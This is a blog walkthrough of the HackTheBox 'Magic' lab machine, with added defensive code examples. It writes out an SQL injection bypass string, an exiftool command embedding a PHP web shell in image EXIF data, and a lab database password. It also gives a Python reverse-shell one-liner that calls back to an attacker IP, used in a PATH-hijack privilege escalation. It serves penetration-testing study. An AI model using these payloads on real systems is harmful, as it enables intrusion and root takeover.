HTB Magic Walkthrough


Hadi AL Halbouni
6 min read, Aug 22, 2020


Magic from HackTheBox is rated as a medium Linux box. We exploit a SQL injection weakness in the login form to authenticate to the admin panel, then bypass the upload restrictions by embedding a code execution payload in an image's EXIF data and faking the image magic bytes using ExifTool, then dump the SQL database to get user privileges, and finally manipulate the PATH variable to get root.

Reconnaissance

We start with an Nmap scan to check the open ports and the services running on the server:

nmap -sT -sC -sV 10.10.10.185
  • -sT to run TCP scan
  • -sC to use Nmap default script scan
  • -sV to enumerate service version

We see that we have:

  • Port 22 (SSH) is open and runs OpenSSH 7.6p1
  • Port 80 (HTTP) is open and runs Apache 2.4.29

I ran gobuster to enumerate hidden directories:

gobuster dir -u http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

I didn't get much of interest.

So I ran Nikto in the background and went to enumerate the HTTP manually.

This is the web page I got when I browsed to http://10.10.10.185/; it is an image gallery script.

I checked the source code and couldn't find anything important hidden in there. So I clicked the login link in the lower-left corner and got a login page.

I checked Nikto, and unfortunately it couldn't find any useful results apart from the login page.

Exploitation

Before brute-forcing the login page with Hydra, I started looking for low-hanging fruit. I tried SQL injection against the login page, and the Username field turned out to be vulnerable. I entered

admin'or'1'='1

in the Username field and bypassed the login form.
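The difference between a login query built the way this form must have been and a parameterized one, as an added example (this is not the gallery script's own code; the table, the password and the in-memory SQLite database are constructed stand-ins):

```python
import sqlite3

# Constructed stand-in for the gallery's login table, not the real schema.
# Real applications store password hashes; plaintext here only keeps the demo short.
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE login (username TEXT, password TEXT)")
CONN.execute("INSERT INTO login VALUES ('admin', 'correct-horse')")
CONN.commit()

PAYLOAD = "admin'or'1'='1"  # the exact string typed into the Username field


def login_vulnerable(username: str, password: str) -> bool:
    """String-concatenated query: the input becomes part of the SQL text."""
    sql = (f"SELECT username FROM login WHERE username = '{username}' "
           f"AND password = '{password}'")
    # With PAYLOAD the WHERE clause becomes
    #   username = 'admin' OR ('1'='1' AND password = '...')
    # which matches the admin row no matter what password was sent.
    return CONN.execute(sql).fetchone() is not None


def login_safe(username: str, password: str) -> bool:
    """Parameterized query: the driver binds the input as a value, never as SQL."""
    sql = "SELECT username FROM login WHERE username = ? AND password = ?"
    return CONN.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    print("vulnerable:", login_vulnerable(PAYLOAD, "wrong"))     # True: bypassed
    print("safe:      ", login_safe(PAYLOAD, "wrong"))           # False
    print("safe login:", login_safe("admin", "correct-horse"))   # True
```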

After bypassing the login page I got an upload script.

I tried to upload a PHP reverse shell, but there was a restriction in place.

I tried manipulating the header of an image and embedding the shell in it, and I played with the extension of the shell file, but all my attempts to bypass the restriction were in vain.

Then I came across this YouTube video, which explains how to embed a shell in an image's EXIF data.

I ran the following command on the image I had:

exiftool -DocumentName="<h1>RAZZOR<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" car.jpeg

And I got a new JPEG file, which I renamed to car.php.jpeg.

I tried to upload the new image file, and it succeeded.

Now we need to navigate to the file we uploaded. I went to the main page http://10.10.10.185/ but couldn't find my image file in the gallery.

So I checked the source of the page and found that the images get uploaded to

/images/uploads

So I entered http://10.10.10.185/images/uploads/car.php.jpeg?cmd=ls

and BINGOOO

I managed to execute commands on the server.
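An added example (not the gallery's own upload handler) of the server-side checks that would have refused car.php.jpeg: allow exactly one extension from an allowlist, require magic bytes that match it, and scan the whole file, EXIF segments included, for PHP open tags. The file names and byte strings below are constructed.

```python
import os
import re
from typing import Tuple

# Allowed single extensions and the magic bytes each must start with
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
# Matches "<?php" and the short "<?=" tag anywhere in the bytes
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for an uploaded file."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # 'car.php.jpeg' carries two extensions; Apache can hand such
        # a name to the PHP handler based on the inner one
        return False, "filename must be name.ext with exactly one extension"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "magic bytes do not match extension"
    if PHP_TAG.search(data):
        # EXIF fields such as DocumentName are inside the JPEG, so a
        # magic-byte check alone never sees this
        return False, "PHP open tag found inside image data"
    return True, "ok"


# Constructed samples, not files from the box
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
EXIF_WITH_TAG = (b"\xff\xd8\xff\xe1\x00\x40Exif\x00\x00"
                 + b"<?php /* constructed marker */ ?>" + b"\x00" * 16)

if __name__ == "__main__":
    for name, blob in [("car.jpeg", CLEAN_JPEG), ("car.php.jpeg", CLEAN_JPEG),
                       ("car.jpeg", EXIF_WITH_TAG), ("shell.php", b"<?php")]:
        print(name, check_upload(name, blob))
```

Validation alone is not the whole fix: the uploads directory should also have script execution disabled or sit outside the web root, since the real mistake on this box is that the web server executed car.php.jpeg as PHP.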

So I used the Python reverse TCP one-liner from pentest monkey: I listened on port 4444 on my Kali machine, executed the reverse TCP code on the target machine, and got a shell.

I upgraded my shell to a fully interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash");'
Ctrl+Z
stty raw -echo
fg
export TERM=xterm-256color

Privilege Escalation

I started by enumerating the users on the server, and I found "theseus".

I continued with the usual manual enumeration and found an interesting file named db.php5 in

/var/www/Magic

It seems to be a script that connects to a MySQL database. I tried the credentials to switch user with the "su" command, but authentication failed.

I tried to log in to MySQL using the credentials, but I couldn't.

So I tried to dump the Magic database using the following command:

$ mysqldump -utheseus -piamkingtheseus Magic

And I got the data of the login table.

I tried the "su" command again with the newly discovered password, and BAAAM, I am theseus now.

Privilege escalation, phase two.

Escalating from user to root

I used a tool called suid3num. I transferred it from my Kali machine to the target machine using a simple Python HTTP server.

I gave the tool permission 755 and ran it.

This tool lists the SUID binaries on the system alongside the default SUID binaries, so it's easy to compare and see what sticks out, and I found a binary called sysinfo.

I googled it and got:

"sysinfo() returns certain statistics on memory and swap usage, as
well as the load average."

I used the "which" command to locate the tool and the "strings" command to see if there was anything interesting and readable in it,

and I found that the tool uses other tools to do its job.

So the tool calls lshw to get hardware info and fdisk to get disk info, so let's use "which" and "ls -la" to investigate who runs these tools.

The tools (fdisk and lshw) are being run as root.

So we have a tool called "sysinfo" that we can run with our current privileges, and this tool calls other tools that run under root privileges.

So if we create a fake file named fdisk containing code that makes a reverse TCP connection, and fool the system into running this fake file instead of the real one by manipulating the PATH variable, we get a shell as root.

I started listening on port 1337 with Netcat on my Kali machine, then created a file named fdisk on the target machine containing the reverse connection code using the "echo" command, and gave it permission 755:

echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.64\",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'" > fdisk

Then I manipulated the PATH variable so that the /tmp directory is searched first for binaries:

export PATH=/tmp:$PATH

Note: This article explains how the PATH variable works and how it can be manipulated to escalate privileges.

Then I ran sysinfo. The tool tried to call fdisk, the lookup found the malicious fdisk file I had placed first in PATH instead of the real one, and I got a reverse shell as root.
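Why the lookup picked /tmp/fdisk, and the check that defeats it, as an added example (not code from the box or from sysinfo): the first function mimics the execvp-style search that /bin/sh performs for system("fdisk"), the second ignores the caller's PATH by default and refuses any world-writable directory. The directories and stand-in fdisk files are constructed under a temp dir; the equivalent fix inside a SUID binary is to call /sbin/fdisk by absolute path or reset PATH before calling system().

```python
import os
import stat
import tempfile
from typing import Optional, Tuple

# What a privileged helper should search instead of the caller's environment
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def lookup_like_execvp(cmd: str, path: str) -> Optional[str]:
    """Mimic the shell: the first executable named cmd in PATH order wins."""
    for d in path.split(":"):
        cand = os.path.join(d, cmd)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def lookup_hardened(cmd: str, path: str = TRUSTED_PATH) -> Optional[str]:
    """Default to a fixed PATH and skip directories that others can write to."""
    for d in path.split(":"):
        try:
            mode = os.stat(d).st_mode
        except FileNotFoundError:
            continue
        if mode & stat.S_IWOTH:  # e.g. /tmp: anyone could plant a binary here
            continue
        cand = os.path.join(d, cmd)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def demo() -> Tuple[Optional[str], Optional[str]]:
    """Build a 1777 'tmp' and a 0755 'sbin', each holding a stand-in fdisk,
    then resolve 'fdisk' with PATH=tmp:sbin using both lookups."""
    root = tempfile.mkdtemp()
    tmp, sbin = os.path.join(root, "tmp"), os.path.join(root, "sbin")
    os.mkdir(tmp)
    os.chmod(tmp, 0o1777)  # world-writable like the real /tmp
    os.mkdir(sbin)
    os.chmod(sbin, 0o755)
    for d in (tmp, sbin):
        f = os.path.join(d, "fdisk")
        with open(f, "w") as fh:
            fh.write("#!/bin/sh\necho constructed stand-in\n")  # harmless placeholder
        os.chmod(f, 0o755)
    attacker_path = f"{tmp}:{sbin}"
    # The hardened lookup is handed the attacker's PATH on purpose here, to show
    # that the writable-directory check alone already skips the planted copy.
    return lookup_like_execvp("fdisk", attacker_path), lookup_hardened("fdisk", attacker_path)
```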


Hadi AL Halbouni

Software engineer with double master's degrees in Cyber Security. I have a huge passion for cyber security and penetration testing. Preparing for OSCP.